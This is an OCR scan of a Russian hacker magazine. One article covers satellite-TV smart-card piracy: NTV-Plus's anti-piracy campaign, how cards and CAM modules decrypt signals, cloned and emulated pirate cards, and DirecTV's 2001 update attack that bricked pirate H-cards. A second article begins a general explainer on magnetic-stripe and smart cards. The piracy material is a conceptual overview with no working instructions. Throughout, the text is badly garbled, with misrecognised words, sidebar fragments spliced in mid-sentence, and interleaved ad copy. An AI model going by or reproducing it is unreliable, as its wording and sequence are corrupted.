вскрывают любые разработанные 
Начиная с системы защиты. А дальше по наме- 
июля прос- $ 
мотр зако- танной - резко начинает расти число 
дированного пиратских карт и, соответственно, 
спутниково- 
го ТВ на уменьшаются доходы от законных 
русском абонентов. После 1 июля у НТВ+ чис- 


языке с по- 
мощью ши- 
роко расп- 
ространен- 
ных в стра- 
не пиратс- 
ких смарт- 
карт стал 
невозможен. 


С сентября 
2002 года 
компания 
НТВ-Плюс 
официаль- 
ного объя- 
вила о наг- 
раде в 1000 
зеленых 
фантиков 
"за голову 
каждого от- 
ловленного 
пирата"". 


ло подписчиков за месяц подскочи- 
ло примерно на 35 тысяч (хотя 
обычно прирост составлял около 5 
тысяч в месяц), наглядно подтверж- 
дая необходимость подобных мер. 


Другая, тоже приносящая опреде- 
ленные плоды, форма противодей- 
ствия пиратству - применение сило- 
вых и юридических рычагов. После 
нескольких лет малоэффективных 
рейдов с милицией по торговым 
точкам, распространяющим контра- 
фактные карты, в НТВ-Плюс прибег- 
ли к более любопытному способу 
борьбы. С сентября 2002 года ком- 
пания официального объявила о 
награде в 1000 зеленых фантиков 
"за голову каждого отловленного 
пирата". Точнее за информацию о 
нелегальной трансляции сигнала 
НТВ-Плюс по кабельным сетям, о 
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лицах, похищающих ключи доступа 
к спутниковому сигналу, изготавли- 
вающих пиратские карточки, а так- 
же об оптовых и розничных распро- 
странителях этой продукции. Под- 
робнее читай на Www.piratam.net. 
Причем подобные активные меры 
по пресечению пиратского бизнеса 
были распространены и на ближнее 
зарубежье - Беларусь и Украину. 


Результатом всех этих усилий стали 
около десятка довольно громких су- 
дебных процессов (в Омске, Ивано- 
во, Гульской области). Несмотря на 
то, что все распространявшиеся пи- 
ратами смарт-карты стали уже непри- 
годными, компания НТВ-Плюс заяви- 
ла, что решительно намерена про- 
должать свою борьбу и будет доби- 
ваться обвинительного заключения 


Взаимодействие спутника 
и смарт-карты осуществляется 
посредством CAM-mogyna 


ed 


по всем уже начатым "пиратским" 
уголовным делам. 


Попутно компания НТВ-Плюс проин- 
сформировала общественность, что 
"отличительная особенность новой 
системы кодирования Viaccess PC 2.4 
- исключительно высокая защищен- 
ность от пиратского взлома", посколь- 
ку специалисты France Telecom, раз- 
работавшие эту систему, уверены, что 
вскрыть Viaccess PC 2.4 невозможно... 


КАК ЭТО РАБОТАЕТ 

Что, в самых общих чертах, 
представляет собой современная 
система платного спутникового теле- 
видения? С точки зрения ТВ-компа- 
нии и обычного легального подпис- 
чика, самое главное в этой системе - 
карта доступа (смарт-карта). Она при- 
обретается вместе с ТВ-аппаратурой 
спутникового приема либо отдельно, 
если комплект из антенны-тарелки и 
приемника-ресивера уже имеется. 
При использовании карта вставляет- 
ся в спот ресивера. 


Карта доступа небольшая (размером 
примерно со стандартную кредитку), 
но представляет собой полноценный 
микрокомпьютер с процессором, 
встроенным программным обеспече- 
нием и памятью. Программное обеспе- 
чение, прошитое в смарт-карту, управ- 
ляет приемом и декодированием паке- 
та каналов той компании, которая вы- 
пустила данную карту доступа. 


После установки оборудования або- 
нент выбирает интересующий его на- 
бор каналов, оплачивает и каким-ли- 
бо образом (обычно по телефону) 
связывает ресивер/карту с ТВ-компа- 
нией. Происходит активизация смарт- 
карты, открытие доступа к оплачен- 
ным каналам и, довольно часто, при- 
вязка к конкретному приемному обо- 
рудованию (как мера против клони- 
рования карт). 


Если рассматривать эту систему с тех- 
нической позиции, то самое главное - 
как именно реализованы защита и 
расшифровывание сигналов платного 
телевидения. Начиная с середины 
1990-х годов компании спутникового 
телевидения активно переходят на 
цифровые технологии вещания. Поэ- 
тому устаревшие методы защиты ана- 


Смарт-карта 
приобрета- 
ется вместе 
с ТВ-аппа- 
ратурой 
спутниково- 
го приема 
либо от- 
дельно, если 
комплект из 
антенны-та- 
релки и при- 
емника-ре- 
сивера уже 
имеется. 


Взаимодей- 
ствие спут- 
ника и 


смарт-кар- 
ты осущес- 
твляется 
посредством 
САМ-моду- 
ля. Прини- 
мая спутни- 
ковый сиг- 
нал, САМ- 
модуль 
транслирует 
карте всю 
служебную 
информа- 
цию, иду- 
щую в кана- 
ле парал- 
лельно ви- 
деосигналу 
(аналогично 
телетексту). 


CAM-=-Mogynb 
(часто на- 
зывают де- 
кодером) 
необходим, 
потому что 
у смарт- 
карты не- 
достаточно 
вычисли- 
тельной 
мощности 
для самос- 
тоятельного 
расшифро- 
вывания ви- 
деоизобра- 
жения. 


Среди gpy- 
гих способов 
сейчас у 
большин- 
ства пира- 
тов наибо- 
лее попу- 
лярна раз- 
ного рода 
эмуляция 
фирменных 
смарт-карт. 
Чаще всего 
это бывают 
либо так на- 
зываемые 
ОР$С-кар- 
ты, либо 
МО$С-кар- 
ты. 


Главным 
объектом 
январской 
ЕСМ-атаки 
DirecTV 
стали так 
называемые 
Н-карты 
(типа 
MOSC), 
пользовав- 
шиеся у пи- 
ратов наи- 
большей 
популяр- 
ностью 
вследствие 
своих 
конструк- 
тивных осо- 
бенностей. 
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логового сигнала я рассматривать не 
буду, но любителям истории посове- 
тую пару информативных сайтов: 
hem.passagen.se/sat/encyclo.htm и www.hack- 
watch.com/~kooltek/faq.html. 


Взаимодействие спутника и смарт- 
карты осуществляется посредством 
САМ-модуля. Принимая спутниковый 
сигнал, САМ-модуль транслирует кар- 
те всю служебную информацию, иду- 
щую в канале параллельно видеосиг- 
Hany (аналогично телетексту). На зак- 
рытых каналах в этой информации 
есть, среди прочего, и схема восста- 
новления (криптопараметры) телесиг- 
нала. Эти криптопараметры зашисфро- 
ваны, и именно для их расшифровки 
в смарт-карте есть ключи. 


Получив от САМ-модуля необходимую 
информацию, карта ее расшифровы- 
вает собственным процессором и 
возвращает назад. А САМ-модуль, ко- 
торый часто называют декодером, с 
помощью этой расшифрованной схе- 
мы восстанавливает телесигнал. САМ- 
модуль необходим, потому что у 
смарт-карты недостаточно вычисли- 
тельной мощности для самостоятель- 
ного расшисфровывания видеоизоб- 
ражения. 


Криптопараметры сигнала изменяют- 
ся каждые 10-15 секунд, но зашифро- 
ваны они одним ключом, который хра- 
нится в смарт-карте и меняется значи- 
тельно реже. Впрочем, "реже" - поня- 
тие относительное и может подразу- 
мевать срок от нескольких недель go 
нескольких часов, в зависимости от 
конкретной телекомпании. 


КАК ЭТО ОБХОДИТСЯ 

m Если посмотреть на это с точки 
зрения пиратов, то самый очевидный 
способ нелегального просмотра за- 
щищенных ТВ-каналов - клонировать 
легальную карту. Для этого на специ- 
альном оборудовании, иногда весьма 
дорогом, изготовляется ее полный 
аналог, неотличимый по функцио- 
нальным возможностям от оригинала. 
Работать такой клон будет до тех пор, 

пока работает оригинал. Чем- 

то это напоминает печата- 
м ние фальшивых денег, 
только технически про- 
ще и окупа- 
ется быст- 
рее. 


Ш Под электронными контрмерами или ECM (Electronic Counter 
Measure), вообще говоря, принято понимать любые мероприятия, 
дистанционно проводимые ТВ-компаниями для препятствования 


пиратской деятельности. Обычно под этим понимается внеплано- 
вая или просто учащенная смена криптографических ключей. Og- 
нако в последнее время под ЕСМ стали понимать нечто значитель- 
но более существенное - модификацию схемы устройства. 


Среди других способов сейчас у 
большинства пиратов наиболее попу- 
лярна разного рода эмуляция фир- 
менных смарт-карт. Чаще всего это 
либо так называемые ОР$С-карты 
(digital pirate smart card - цифровая 
пиратская смарт-карта, целенаправ- 
ленно изготовленная для нелегаль- 
ного просмотра), либо МО5С-карты 
(modified original smart card - моди- 
фицированная оригинальная смарт- 
карта, изначально выпущенная для 
осрициальной подписки, но затем мо- 
дифицированная соответствующим 
образом для просмотра шифрован- 
ных каналов без оплаты). 


работка британской фирмы NDS) 
запрограммирована собственным 
кодом, который идентифицирует ле- 
гального абонента и позволяет ему 
смотреть только те каналы из спут- 
никового цифрового сигнала 
DirecTV, которые оплачены. Все ос- 
тальные каналы остаются зашифро- 
ванными и в теории считаются не- 
доступными для просмотра. Однако 
буквально с самых первых месяцев 
вещания DirecTV в 1994 году, кряке- 
рским сообществом была разверну- 
та деятельность по обеспечению пи- 
ратского просмотра телеканалов бе- 
зо всякой абонентской платы. Осо- 


Спутниковое телевидение - 
это не интернет, здесь для вещания 
на другие страны нужна лицензия 


DIRECTV VS ПИРАТЫ 

m Конкретные формы пиратской ge- 
ятельности и борьбы компаний плат- 
ного телевидения с нелегальным 
просмотром имеет смысл рассмотреть 
на примере американской компании 
DirecTV (www.directv.com). Это круп- 
нейшая в мире фирма спутникового 
телевидения с числом подписчиков, 
по скромным подсчетам, порядка 15 
миллионов. 


В двадцатых числах января 2001 года 
сразу несколько крупных компаний 
спутникового телевидения (америка- 
нские DirecTV и Echostar Dish 
Network, а также испанская Canal 
Satelite Digital) практически одновре- 
менно нанесли массированные "уда- 
ры возмездия" по пиратским ресиве- 
рам и смарт-картам, обеспечивающим 
бесплатный просмотр. При этом были 
использованы электронные контрме- 
ры по активному воздействию на ап- 
паратуру, что обычно принято рас- 
сматривать как сугубо военное "ин- 
формационное оружие". 


Наиболее эффективные 
контрмеры были проде- 
монстрированы компа- 
нией DirecTV. В соот- 
ветствии с устояв- 
шейся в отрасли 
- технологией, 
НЕ здесь каждая 
смарт-карта 
доступа (раз- 


бую популярность весьма прибыль- 
ный бизнес по продаже пиратских 
карт и "серых" ресиверов приобрел 
в Канаде, где у DirecTV нет лицен- 
зии на вещание, и где продажа кряк- 
нутых карт вплоть gO прошлого года 
не являлась преступлением. 


Главным объектом январской ЕСМ- 
атаки DirecTV стали так называемые 
Н-карты (типа MOSC), пользовавши- 
еся у пиратов наибольшей популяр- 
ностью вследствие своих конструк- 
тивных особенностей. Н-карты про- 
давались в комплекте с ресиверами 
с 1996 go начала 1999 года. Это бы- 
ла одна из исходных смарт-карт, 
имевшая в своей защите ряд сла- 
бостей, которые позволили кряке- 
рам провести обратную инженерную 
разработку микрочипа, а затем нау- 
читься самим его перепрограммиро- 
вать. Это позволило так изменять 
модель абонентской подписки, что 
становилось возможным открывать 
все каналы сразу. 


В телекомпаниях сейчас тоже работа- 
ют свои хакеры, которые встроили в 
систему механизм, позволяющий об- 
новлять содержимое смарт-карт с по- 
мощью команд в транслируемом спут- 
никовом сигнале. Этот механизм об- 
новлений в DirecTV стали применять 
для поиска и уничтожения "крякну- 
тых" карт, записывая в микрочип та- 
кие коды, которые нарушали работу 
лишь пиратских продуктов. 
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По сути, нелегальные смарт-карты запирались в состоя- 
нии бесконечного цикла. Пиратское сообщество ответи- 
ло на этот ход новым устройством, получившим назва- 
ние unlooper - специальный программатор-"расциклов- 
щик" для восстановления поврежденных карт. Затем 
крякеры разработали программу-троянца, которая запи- 
сывалась в смарт-карту и эдрофективно блокировала воз- 
можности ресивера по обновлению содержимого карты. 
В такой ситуации DirecTV оставалось лишь рассылать 
свои обновления с повышенной частотой, одновременно 
проверяя, чтобы обновление непременно присутствова- 
ло в ресивере. Лишь на этом условии видеосигнал под- 
давался декодированию. Обновления стали проходить 
практически каждый месяц. После каждого такого апдей- 
та, спустя примерно минут 15, пираты изготовляли и 
распространяли через интернет программную заплатку, 
обходящую новую помеху. 


а ветровка (С 
BI" с логотипом 
темно-синяя, чер 


С началом осени 2000 года DirecTV изменила тактику. 
Байты обновления стали рассылать значительно чаще, 
практически еженедельно, причем по нескольку порций 
за раз, явно нарушая давно сложившуюся традицию. Кря- 
керы по-прежнему легко обходили все эти обновления, но 
не очень понимали, к чему идет дело. Некоторые подума- 
ли, что компания решила взять их на измор, заставляя пе- 
репрограммировать смарт-карты пиратской клиентуры 
практически непрерывно. Ко всем этим обновлениям, в 
общем-то, привыкли. 


Сами по себе обновления представляли бессмысленные 
наборы байт, но их наличие было необходимо, чтобы кряк- 
нутое оборудование могло принимать видеосигнал. Поэто- 
му волей-неволей все эти байты приходилось накапливать 
и в пиратских программах-прошивках. 


Затем в ноябре прошел еще один цикл обновлений, и тут 
крякеры увидели, в чем был замысел DirecTV. Благодаря 
последней порции байт, все ранее загруженные фрагмен- 
ты кода объединились в единое целое, образовав динами- 
ческую программу или "логическую бомбу", являющуюся 
неотъемлемой частью смарт-карты. Новая динамическая 
программа изменила всю структуру работы старой техно- 
логии, придав ей дополнительную мощь и гибкость. Пира- 
ты уже поняли, что новые возможности дали DirecTV эф- 
фективное тайное оружие, но каким именно образом оно 
будет применено, оставалось непонятным. 


Все встало на свои места воскресным вечером 21 января 
2001 года, когда Америка поголовно прилипла к телеэкра- 
нам, следя за матчами своего футбольного Суперкубка 
Super Bowl. Время "удара возмездия" было рассчитано у 


ВСЕ ЭТИ ФИШКИ ТЫ МОЖЕШЬ ЗАКАЗАТЬ 
НА НАШЕМ САЙТЕ WWW.XAKEP.RU, 
ИЛИ ПО ТЕЛЕФОНУ: (095) 928-0360, (095) 928-6089 


Специалис- 
ты из 
DirecTV, 
разработав- 
шие эту 
атаку, под- 
писали свою 


акцию с 
чисто хаке- 
рской глум- 
ливостью. В 
каждой на- 
вечно за- 
пертой 
смарт-карте 
первые во- 
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перезапи- 
санной 


программы 
читались 
как САМЕ 
OVER :). 


Среди глав- 
ных причин 
массового 
распростра- 
нения неле- 
гальных 
смарт-карт 
выделяются 
три, кото- 
рые доволь- 
но условно 
можно наз- 
вать соци- 
альной, 
экономичес- 
кой и тех- 
нической. 


ВЕЧНЫЙ БОЙ С ПИРАТАМИ | 
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точно, и именно теперь был "спущен 
курок". В видеосигнале DirecTV прош- 
ла команда, которая разом вырубила 
все пиратские Н-карты. По некоторым 
подсчетам, в один день были "отстре- 
лены" около 98% всех крякнутых 
карт, число которых состав- 

ляло, по грубым оценкам, 
около 200 тысяч штук. 


На этот раз бесконеч- 
ный цикл, запирающий 
чип, был прописан в 
"одноразовый" раздел 
памяти, в принципе не 
поддающийся повтор- 
ной перезаписи. Это 
превратило карту в абсо- 
лютно бесполезную 
вещь. Причем специалис- 
ты из DirecTV, разработав- 
шие эту атаку, подписали 
свою акцию с чисто хакерс- 
кой глумливостью. В каждой 
навечно запертой смарт-карте 
первые восемь байт перезаписанной 
программы теперь стали читаться 
как GAME OVER :). 


Впрочем, игра вовсе не окончена. 
Крякнутые смарт-карты DirecTV HOBO- 
го поколения (НУ-карты) начали появ- 
ляться на сером рынке чуть ли не од- 
новременно с поступлением легаль- 
ных карт к дилерам. Другая современ- 
ная технология пиратов вообще не 
опирается на карты доступа, а пол- 
ностью эмулируется программно на 
персональном компьютере. Техноло- 
гии такого рода вообще никак не пост- 
радали от январской атаки. Конечно, 
теперь последуют новые контратаки 
DirecTV, но, как комментируют ситуа- 
цию участники противостояния, "это 
война, причем такая, которая будет 
длиться вечно". 


ПРИЧИНЫ ВЗЛОМА 
СМАРТ-КАРТ 
m Среди главных при- 
чин массового 
распростра- 
нения 


Ш В DirecTV, естественно, постоянно работают над укреплением 
защиты своей системы. Однако в течение 2000-2001 годов кряке- 
рским подпольем были взломаны криптосхемы практически всех 
популярных систем защиты спутникового вещания. И в конце 2000 
года многим уже казалось, что DirecTV в этой нескончаемой игре в 


кошки-мышки начала безнадежно проигрывать. Пиратам удалось 
полностью дешифровать весь сигнал DirecTV, включая самые go- 
рогие каналы с оплатой за каждый просмотр и трансляцией новей- 
ших кинофильмов-хитов. Однако в начале 2001 года по пиратским 
картам был нанесен удар такой силы, что стало ясно - вопрос о по- 
бедителях в этом противостоянии еще далек от разрешения. 


нелегальных смарт-карт выделяются 
три, которые довольно условно мож- 
но назвать социальной, экономичес- 
кой и технической. 


Социальная причина заключается в 
том, что в обществе имеется спрос, на 
который далеко не всегда есть ле- 
гальные предложения. Это совершен- 
но очевидный источник массового 
распространения пиратства в сфере 
спутникового телевидения, поскольку 
нелегальный просмотр - нередко 
единственный для людей способ goc- 
тупа к интересным закрытым каналам. 
Вызвано это огромным несоответстви- 
ем между техническими возможностя- 
ми аппаратуры и правовыми нормами 
межгосударственных отношений. 
Спутниковое телевидение - это не ин- 
тернет, здесь для вещания на другие 
страны нужна лицензия. И хотя кана- 
лы многих вещателей "видны" по 
всей Европе, свою подписку они могут 
продавать лишь резидентам очень 
немногих стран. Или вообще одной 
страны, где имеется лицензия на ве- 
щание. 


Лицензия же стоит немалых денег и 
часто сопровождается требования- 
ми к содержанию (переводу) пере- 
дач, причем в каждой стране эти 
требования разные. Поэтому, напри- 
мер, американские компании не име- 
ют лицензии на вещание в Канаде 
(где, в частности, весьма строгие за- 
коны о двуязычном сопровождении 
передач), а в России есть вообще 
лишь один официальный оператор 


платного спутникового телевидения 
(пиратить которого, естественно, де- 
ло абсолютно противозаконное). За- 
то все остальные сотни доступных 
телеканалов поневоле придется 
смотреть нелегально, но и судебное 
преследование за это вряд ли кому 
грозит. 


Из первой причины естественным 
образом вытекает вторая, экономи- 
ческая. В описанных условиях сфор- 
мировался массовый серый рынок 
со своими, сейчас уже весьма круп- 
ными, финансовыми интересами и 
мощными стимулами для поошрения 
пиратства. На продаже ресиверов, 
тарелок и смарт-карт для нелицензи- 
рованного просмотра спутникового 
телевидения сегодня делаются де- 
сятки миллионов долларов. А посто- 
янно подпитывать этот рынок можно 
лишь один путем - дфинансируя неп- 
рерывное вскрытие регулярно об- 
новляемой защиты систем вещания. 


Еще одна важная, техническая, 
причина массового пиратства зак- 
лючается в том, что декларируемая 
компаниями защита смарт-карт су- 
щественно отличается от защиты 
реальной. Несмотря на все завере- 
ния о "гарантированной стойкости 
нового продукта к вскрытию", прак- 
тика показывает, что при наличии 
достаточно мощного финансового 
интереса взламываются любые кар- 
ты любой компании, причем зачас- 
тую при непосредственном участии 


фирм-конкурентов. 


MUP ЦИСОРОВОГО ТЕЛЕВИДЕНИЯ 


Выбери только) 
что будешь спо ЕЯ 


Пакет "Мндивидуальньйй” = 
набор каналов по запросу, 


. Деловой мир 
(7 новостных каналов 
Sky News, Euronews, 91901908 
РБК-ТВ, BBC World, CNBC) 
Mup кино К 
(5 фильмовьых каналофё - Романтика, 
АЛыровсое кино, TCM, Halimark, Телеклуб) 
Удивительньия мир 

(7 познавательных каналов - Animal Planet, 

| National Geographic, Travel, все верхсим Discovery) 

Детский мир 
\ (5 каналов - Cartoon Netwo Mickolodeon, 
\ Fox Kids, Детский мир, Школьнык-ТВ) 


Мир спорта 
\ (4 канала — Eurosport, а. — 
\ Sports, АВ Moteurs) 


\ Мир музыки 
[65 музьжально-разеалиекастельниыяих каналов — Дамский 


\ 
\ 
, клуб, MTV Hits, VH-1, Fashion TV, Reality TV) 
Пакет us 15 российских каналов 
(прадоставаляется доле гиныттеалеь о 


к любому мини-пакету) 


Вы: сами формируете свой пакет ТВ-каналов. 
Пюбая = пика: мультфильмы: или сермаль! спорт млы музька, 
образо q - 1 новости — еъ!бор зависит только от Вас. 


| Сумма ежелглесятчнсия полатьи должна 
$ составлять, HE пленее $12". 
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СОВЕРШЕНСТВОВАНИЕ ЗАЩИТЫ ) 


Олег "2sheds" Курапов (ok@2sheds.ru, www.2sheds.ru) 


Ирина Джатиева, руководитель департамента пластиковых карт компании СМР-РуссКом (www.plasticcards.ru) 


СОВЕРШЕНСТВОВАНИЕ 
ЗАЩИТЫ 


ПЛАСТИКОВЫЕ КАРТЫ НА ВСЕ СЛУЧАИ ЖИЗНИ 
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B от уже несколько десятилетий пластиковые карты широко используются в повседневной жизни. Появившись 
задолго до распространения персональных компьютеров и сотовых телефонов, они заменяют бумажные купюры, 
пропуска и удостоверения. 


р 


о очевидные преиму- 


щества скрывают за 


собой менее очевид- 


Многие из 
нас могут 
даже He go- 
гадываться, 
что являют- 
ся пользова- 
телями 
смарт-карт. 
К примеру, 
$1М-карта 
твоего сото- 
вого теле- 
фона явля- 
ются той 
самой "ум- 
ной картой", 
но без 
"лишнего" 
пластика. 


Они есть иу 
студентов, и 
у бизнесме- 
нов, иу 90- 
мохозяек - 
дебетные и 
кредитные, 
для проезда 
на общест- 
венном 
транспорте, 
оплаты те- 
лефонных 
переговоров, 
доступа в 
интернет и 
т.п. 


Согласно 


стандарту 
150-7810, 
пластиковая 
карта npegc- 
тавляет со- 
бой прямоу- 
гольную 
пластину 
размером 
85,6x54 мм 
и толщиной 
0,76 мм. 


ные недостатки. Если 


ОЛЯ ТОГО, чтобы лишить 


тебя наличности, мошеннику необхо- 
QUMO вытащить кошелек у тебя из 
сумки или кармана, то для воровства 
с помощью пластиковых карт OH MO- 
жет находиться в соседней комнате, а 
может и на другом континенте. 


Проблема identity {Ней (дословно - во- 
ровство идентификационных данных) 
стала в последнее время одной из са- 
мых обсуждаемых тем. Хотя под этим 
термином понимают и подделку че- 
ков, и кражу паролей, а по мере расп- 
ространения альтернативных меха- 
низмов аутентификации (в частности, 
биометрия) приходится учитывать все 
новые и новые возможности для зло- 
употреблений личной информацией, 
в центре внимания находятся именно 
пластиковые карты. 


Они есть и у студентов, и у бизнесме- 
нов, и у домохозяек - дебетные и кре- 
дитные, для проезда на обществен- 
ном транспорте, оплаты телефонных 
переговоров, доступа в интернет и т.п. 
Дошло до того, что пластиковые теле- 
фонные карты стали объектом кол- 
лекционирования - на любом онлайн- 
аукционе можно найти раздел, посвя- 
щенный этой "срилателии ХХ! века". 
Даже в поликлиниках вместо бумаж- 
ного страхового полиса теперь выда- 
ют пластиковые карты! 
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По методу хранения информации 
весь этот "пластик" можно разделить 
на три основных категории: карты с 
магнитной полосой, скретч-карты и 
смарт-карты. В отдельную группу вы- 
деляют пластиковые визитные кар- 
точки и прочую сувенирную Npogyk- 
цию, виды правонарушений с их ис- 
пользованием якобы неизвестны. Хо- 
тя в метро я несколько раз проходил 
мимо свирепых старушек, показывая 
им пластиковый календарик, причем 
прошлогодний :). 


КАРТЫ С МАГНИТНОЙ 
полосои 

Первое, что приходит в голову, 
когда слышишь термин "пластиковая 


карта" - это классические карты с маг- 
нитной полосой. Появились они еще в 
50-х годах прошлого века. Пионером 
в использовании новой технологии 
стала компания Diners Club, а затем к 
ней присоединилась и American 
Express. За это время карты распрост- 
ранились по всему миру, на них же и 
приходится самый большой процент 
противоправных действий или, поп- 
росту говоря, случаев мошенничества 
и воровства. 


Согласно стандарту 150-7810, пласти- 
ковая карта представляет собой пря- 
моугольную пластину размером 
85,6X54 мм и толщиной 0,76 мм. Для 
защиты этого миниатюрного кусочка 
пластмассы используются последние 
технологии в самых разных областях: 
полиграсфии, химической промышлен- 
ности, разработке программного обес- 
печения и т.п. 

What the Numbers Mean 
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НОМЕР КАРТЫ 
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Банковская карта, вид сзади 


Обычно карта несет на себе следую- 
щую информацию: 


На лицевой стороне: 


- уникальный 16-значный номер; 
- срок действия (от и go); 
- имя владельца. 


На тыльной стороне: 


- магнитная полоса; 
- подпись владельца. 


Кроме того, полиграфическим спосо- 
бом на карту может наноситься мно- 
жество изображений: фотография 
владельца, справочная информация 
для клиентов банка и т.п. 


Буквы и цифры на лицевой стороне 
могут быть выбиты специальным эм- 
боссером, а могут быть и просто напе- 
чатаны, к примеру, как на картах Visa 
Electron. 


Основным хранилищем данных Ha 
карте является магнитная полоса. По 
своим свойствам она похожа на плен- 
ку, которая используется в аудиокас- 
сетах. Информация может записы- 
ваться на три дорожки, отличающие- 
ся форматом: 


- первая имеет плотность записи 210 
бит на дюйм (ВР!) и может содержать 
79 7-битных (6 бит + четность) ancpa- 
витно-цифровых символов (доступны 
только для чтения); 

- вторая - 75 BPI, содержит 40 5-бит- 
ных (4 бита + четность) циор; 

- третья - 210 BPI, содержит 107 5-бит- 
ных (4 бита + четность) циор. 


На банковских картах на дорожки за- 
писываются: номер счета, код валюты, 
код страны выдачи, имя владельца, 
срок действия (в принципе, та же ин- 
формация, что напечатана на самой 
карте, но в цифровом виде). Кроме то- 
го, любая компания может использо- 
вать собственный ‹формат данных. 
Например, для использования в каче- 
стве внутреннего пропуска там вместо 
номера счета может быть указан уро- 
вень полномочий владельца и т.п. 


Каждый раз для проведения денеж- 
ных транзакций с помощью банковс- 
ких карт системой инициируется про- 


Возможность оплаты через интернет 


A 


Старый добрый банкомат 


цесс аутентификации - проверяется 
правильность записанной на карте 
информации. Аутентификация быва- 
ет следующих видов: 


- голосовая авторизация - простей- 
ший случай, проводится с помощью 
телефона с тоновым набором; 

- электронный терминал - считывание 
информации с магнитной полосы, 
например, в банкоматах или РОЗ-тер- 
миналах; 

- виртуальный терминал - проверка 
данных при оплате через интернет. 


В любом случае, на одной стороне на- 
ходится владелец карты, а на другой - 
специализированная организация 
(aquirer), которая устанавливает 
связь с банком, выдавшим карту, для 
проверки данных: 


- номер карты; 
- лимит (для кредитной карты); 
- срок действия карты; 

- наличие денег на счете. 


Если все необходимые условия вы- 
полнены, а запрошенная сумма не 


Проверка данных при совершении 
транзакции 


превышает остаток на счете, эта же 
организация обеспечивает гарантии 
перевода денег другому участнику 
транзакции. 


Передача данных между терминалом 
и проверяющей организацией проис- 
ходит по телефонным сетям или по 
интернет-каналам. Для защиты пере- 
даваемых данных используется 
шифрование. К примеру, банкомат 
шисфрует введенный PIN-Kog и отп- 
равляет его для сверки с тем, что 
хранится в базе данных банка, вы- 
давшего карту. Для шифрования ис- 
пользуется криптограсфический ме- 
TOG односторонних функций. ИХ зна- 
чение легко вычислить в одном нап- 
равлении с использованием банко- 
BCKOrO ключа и набранного PIN-koga, 
а проведение обратного преобразо- 
вания (инвертирования) на практике 
очень HESCPCPEKTMBHO, даже если 
банковский ключ стал известен. Эта 
защита была введена, чтобы защи- 
тить держателя карты от действий 
нехорошего дяди, получившего дос- 
туп к банковским базам. 


Кроме технических средств, большое 
значение имеют организационные и 
административные методы защиты. 
Они включают в себя целый комплекс 
мер на самых разных уровнях: от спе- 
циальных замков на кабинах банко- 
матов и са|-центров экстренной помо- 
щи, куда следует обращаться в слу- 
чае утери или кражи карточки, до пра- 
вительственного контроля над прода- 
жей оборудования для производства 
самих карт. 


Казалось бы, в процессе оплаты по 
пластиковой карте все настолько пре- 
дусмотрено, а каждая операция про- 
ходит столько различных проверок, 
что проще, наверное, было бы внед- 
риться в зарубежную разведку, чем 
украсть деньги со счета. И хотя ста- 
тистику выявления шпионов от нас 
скрывают, судя по доступной инфор- 


мации о случаях мошенничества, все у 


На банковс- 
ких картах 
на дорожки 
записыва- 
ются: номер 
счета, код 
валюты, 
код страны 
выдачи, имя 
владельца, 
срок 
действия (в 
принципе, 
та же ин- 
формация, 
что напеча- 
тана на са- 
мой карте, 
но в цифро- 
вом виде). 


Для шиф- 
рования ис- 
пользуется 
криптогра- 
фический 
метод од- 
носторон- 
них функ- 
ций. Их 
значение 
легко вы- 
числить в 
одном нап- 
равлении с 
использова- 
нием банко- 
вского клю- 
ча и наб- 
ранного 
PIN-Koga. 


И хотя для 
пользовате- 
ля, снимаю- 
щего день- 
ги, процеду- 
ра выглядит 
привычно 
(ввел PIN- 
код и гото- 
во), внутри 
системы ра- 
ботает 
сложный 
механизм 
обмена за- 
шифрован- 
ными дан- 
ными. 


Теперь не- 
радивые 
пользовате- 
ли не будут 
приклеи- 
вать бу- 
мажку с па- 
ролем на 
монитор или 
класть ее 
под клавиа- 
туру :). Бу- 
дет доста- 
точно вста- 
вить свою 
персональ- 
ную (без 
пошлостей) 
карту 

в слот 

и готово. 


ТЕОРИЯ СОВЕРШЕНСТВОВАНИЕ ЗАЩИТЫ \ 


оказывается далеко не так радужно, 
как хотелось бы. При удачных атаках 
добычей хакеров становится инофор- 
мация о миллионах банковских карт. 
И такие случаи происходят достаточ- 
но часто, чтобы заставить беспоко- 
иться каждого, кто хранит свои день- 
ги "на карточке". 


Но проблемы, с которыми сталкивают- 
ся люди при использовании пластико- 
вых карт с магнитной лентой, не огра- 
ничиваются лишь противоправными 
действиями. Как и любая другая тех- 
нология полувековой давности, они 
имеют ряд редостатков. К примеру, 
массу неудобств приносит тот факт, 
что любой магнит может элементарно 
стереть всю хранящуюся инсформа- 
цию, и даже простые царапины могут 
повлиять на ее целостность. И это 
еще не самое страшное, по сравне- 
нию с другими "родовыми травмами". 


СМАРТ-КАРТЫ 

Технология смарт-карт, призван- 
ная исправить эти недостатки, сущест- 
вует довольно давно. Впервые ими на- 
чали пользоваться французы в 1984 
году. Но до сих пор они не получили 
повсеместного распространения. Хотя 
и были планы, согласно которым к 
2004 году все платежные системы со- 
бирались перейти на использование 
смарт-карт, банки все продолжают вы- 
пускать старый добрый "пластик". 


Prrfed Croan 


= Алессио 
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Снаружи карты обоих типов (маг- 
нитные и смарт-карты) выглядят 
почти одинаково, но зато внутри... 
Начну с того, что у обычных карт 
никакого "внутри" вообще нет, ау 
смарт-карт там под позолоченными 
контактами спрятан микрочип. Он 
может содержать до килобайта 
RAM, 24 Кб ROM и 16 Кб перепрог- 
раммируемого КОМ. В нем есть еще 
и 8-битный микропроцессор, рабо- 
тающий на частоте около 5 МГц. И 
все это в упаковке тоньше милли- 
метра! Понятное дело, что с таким 
богатством магнитная полоса отпа- 
дает за ненадобностью. 


Вычислительные возможности про- 
цессора позволяют перейти от обыч- 
ной аутентификации к полноценному 
применению криптограсрии. И хотя 
для пользователя, снимающего день- 
ги, процедура выглядит привычно 
(ввел РИ№-код и готово), внутри систе- 


МИЗНЬ КАРТЫ 


МЫ работает сложный механизм обме- 
на зашифрованными данными. 


Для того чтобы обеспечить максималь- 
ную защиту этих алгоритмов, на каж- 
дом этапе жизненного цикла смарт- 
карт закладывается свой "секрет". Та- 
ким образом, даже если злоумышлен- 
ники внедрятся непосредственно в тех- 
нологический процесс, сами карты не 
будут скомпрометированы. 


Процессор внутри каждой карты рабо- 
тает под управлением операционной 
системы, предоставляющей достаточ- 
но удобный интерсрейс для разработ- 
чика. Именно благодаря этой системе 
и возможно выполнение программ, за- 
пись и чтение сфайлов, шифрование и 
проверка криптограсфических данных. 
Гибкость ее настолько велика, что 
корпорация Sun даже разработала 
nnatcpopmy Java Сага, позволяющую 
использовать для разработки специа- 
лизированных приложений свою 
сверхпопулярную технологию Java. 


Существенно увеличенная (по срав- 
